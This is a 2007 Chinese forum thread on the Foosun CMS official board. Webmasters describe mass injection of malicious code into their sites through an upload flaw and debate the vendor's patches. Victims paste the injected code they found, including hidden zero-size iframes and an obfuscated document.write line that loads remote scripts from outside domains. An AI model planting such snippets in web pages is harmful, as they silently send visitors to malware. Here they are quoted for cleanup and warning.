风讯官方论坛
cqjxc - 2007-8-23 15:25:00
原帖由
liake 于 2007-8-22 10:50:00 发表
我们昨天21号9点多的时候就被挂了,就是那个 中国溧阳
http://www.liyang.gov.cn/ 一个政府网站 嵌入的代码。 IP地址是125.90.0.178 广东湛江的一个网吧发出的,它先把一个突破限制的上传程序伪装成图片......
xx他妈 我21好11点多点被他挂了马 是同一个人同一个IP
asetle - 2007-8-23 15:42:00
一样啊,兄弟,我2天被改了3次,现在还在发布,十几万歌页面,这样按照风讯的发布速度至少要半个月。
老猪快跑 - 2007-8-24 09:22:00
x他妈,我的网站现在被他搞得ftp都传不上东西了
kfsjp - 2007-8-24 10:29:00
caizhi2 - 2007-8-24 10:33:00
终于解决这个问题了,我试了一下,木马已经挂不上去了.
caizhi2 - 2007-8-24 10:33:00
希望尽快作为补丁通知出去吧
zjszph - 2007-8-24 10:45:00
原帖由 asetle 于 2007-8-23 15:42:00 发表
一样啊,兄弟,我2天被改了3次,现在还在发布,十几万歌页面,这样按照风讯的发布速度至少要半个月。
兄弟,你太S了,为什么使用发布啊?直接用批量替换文件把html文件里的代码给删掉就是了。。。。。
祖祖呒言 - 2007-8-24 12:36:00
这个补丁根本就没有用..
我23号打上了..
24号早上2点多时还是被挂了...
或者 - 2007-8-24 12:38:00
我的也是.打上不到半小时就被挂..
mapeyes - 2007-8-24 13:46:00
挂马现象太严重了, 基本所有的网站程序都有人能给你挂上,我都晕了
zai7272 - 2007-8-24 15:18:00
这个补丁根本没有用的,还是照常被挂马,官方啊,开源却查不出漏洞。
zai7272 - 2007-8-24 18:42:00
新补丁终于出来了,敬礼,遇到很多人,都说风讯的安全做的不错,速度快,再次赞一下!
caizhi2 - 2007-8-24 20:43:00
在单位测试挂不上了,回家到一家,网上还是能掛上的.很简单,只要以JPG文件后缀名,都可以上传
苍鹰 - 2007-8-24 21:04:00
应该象动易一样请专业的安全团队进行测试
fly_tiger - 2007-8-24 21:04:00
希望这次真正解决了问题。
youhua2008 - 2007-8-25 08:08:00
希望风讯越来越好。
dyp_2001 - 2007-8-25 10:38:00
我的网站被挂马,我快气死了,怎样才可以找到挂马的地方,清处掉木马,请板主说明
dyp_2001 - 2007-8-25 16:58:00
请问怎样才能找到被感染的文件,处理掉病毒,我已经把补丁更新了!!!:'(
luisyu - 2007-8-25 18:01:00
MB
补玎总算出来了呀
我是隔几天就删木马呀
有时批量挂ASP文件,有时批量挂JS文件,快被整死了!!!:@
dyp_2001 - 2007-8-25 18:09:00
楼上的老兄,怎么删木马呀,我知道中了病毒,但不知如何找到并处理掉:'(
luisyu - 2007-8-25 18:12:00
原帖由
zjszph 于 2007-8-24 10:45:00 发表
原帖由 asetle 于 2007-8-23 15:42:00 发表
一样啊,兄弟,我2天被改了3次,现在还在发布,十几万歌页面,这样按照风讯的发布速度至少要半个月。
兄弟,你太S了,为什么使用发布啊?直接......
兄弟呀,怎么批量替换文件呀?我用的是FlashFXP
MD,一次改动就是好几十,上百个文件,而且很多的是大部份页都要调用的文件。火大呀
最担心的是有些被挂马的文件,没找到。那就惨了,时间一长,会给GOOGLE封掉你的站。。:Q :Q :Q :Q :Q :Q :Q :Q :Q
我就有过一次经历~~~~~~~~`:'( :'( :'( :'( :'( :'( :'(
luisyu - 2007-8-25 18:14:00
原帖由 dyp_2001 于 2007-8-25 18:09:00 发表
楼上的老兄,怎么删木马呀,我知道中了病毒,但不知如何找到并处理掉:'(
]
我是采用最笨的办法呀,找到一个被挂马的文件,然后查看文件“修改时间”。然后一个一个一个文件夹依次看过去。跟“修改时间吻合”的文件肯定是被挂马了,打开编辑吧。。:'( :'( :'( :'( :'(
luisyu - 2007-8-25 18:17:00
我最近两次给挂马时间是
2007-8-24 2:44
2007-8-25 2:00
MB 也玎得太紧了吧,而且是凌晨2点。。。还好偶昨天当了夜猫子,让偶发现了,及时清除,不然时间一长影响真是巨大呀,客人都不敢上我们网站看了呀。:'( :'( :'(
luisyu - 2007-8-25 18:32:00
我xx了!
有一批文件藏得太深,今天才发现的,文件目录是:/Editor/FS_scripts/language/english/
其中几个文件,竟然挂着三个马!!!!:@ :@ :@
1、<iframe src="
http://www.ptvip.cn/soft/pp/index1.htm" width="0" height="0" frameborder="0"></iframe>
2、document.write('<SCRI' + 'PT LANGUAGE="javascript1.2"');
document.writeln(' SRC="
http://ww' + 'w.hc16' + '9.net/news' + '/shxw/2' + '007415/v' + 'ip.' + 'js"></SCR' + 'IPT>');
3、<iframe src="
http://xx.9365.org/ip/1.htm" width=100 height=0></iframe>
真是可怜了,真不是风讯系统的安全问题,还是服务器的问题了:P :P :P
被批量挂马的样子,请看,修改时间一模一样,文件类型一模一样。。。:L :L 可苦了我:Q :Q
附件:
您所在的用户组无法下载或查看附件
秀全 - 2007-8-25 18:58:00
晕,第一次感染index.html index.asp文件,还可以使用DW8批量替换。这又中了,全部JS文件,每一段代码的字符相同,但是位置不同,导致无法替换。查到挂马这些人的来历,刚脱离菜鸟级就开始做实验,希望大家站出来,联合起来对付这些可恶的家伙!
dyp_2001 - 2007-8-25 20:12:00
原帖由 luisyu 于 2007-8-25 18:32:00 发表
我xx了!
有一批文件藏得太深,今天才发现的,文件目录是:/Editor/FS_scripts/language/english/
其中几个文件,竟然挂着三个马!!!!:@ :@ :@
1、<iframe src="[url=http://www.ptvip.cn/soft/pp/in......
我和你中的一样,太可恶了
dyp_2001 - 2007-8-25 21:04:00
我网站的所有*.js文件全部被修改,最后一行加入了这么一行文字.
document.writeln(' SRC="http://ww' + 'w.hc16' + '9.net/news' + '/shxw/2' + '007415/v' + 'ip.' + 'js"></SCR' + 'IPT>');
我想一定是"http://www.hc169.net"的网站主搞的.请板主查实.
祖祖呒言 - 2007-8-25 23:44:00
我也中了..
但我用他上传那个木马文件,清除了他挂的document.writeln(' SRC="http://ww' + 'w.hc16' + '9.net/news' + '/shxw/2' + '007415/v' + 'ip.' + 'js"></SCR' + 'IPT>');代码...
他那木马文件有这样的批量清除功能...
另外,那位用过现在官方的新补丁(foosun4.0所有版本挂马补丁文件下载[更新时间:2007-08-24 18:00:00])没问题的后..麻烦说一声.......
天际流星 - 2007-8-26 00:32:00
第一天 index.htm index.asp被挂马 幸好及时发现
第二天 所有asp文件都被挂马 累就一个字
第三天 所有JS文件被挂马 没有备份了,JS乱七八遭的,干脆删了算了
第四天 网站里没有一个文件没被挂马 傻了
第五天 留下数据库 整站都删掉 :'(
luisyu - 2007-8-26 09:52:00
:L :L :L :L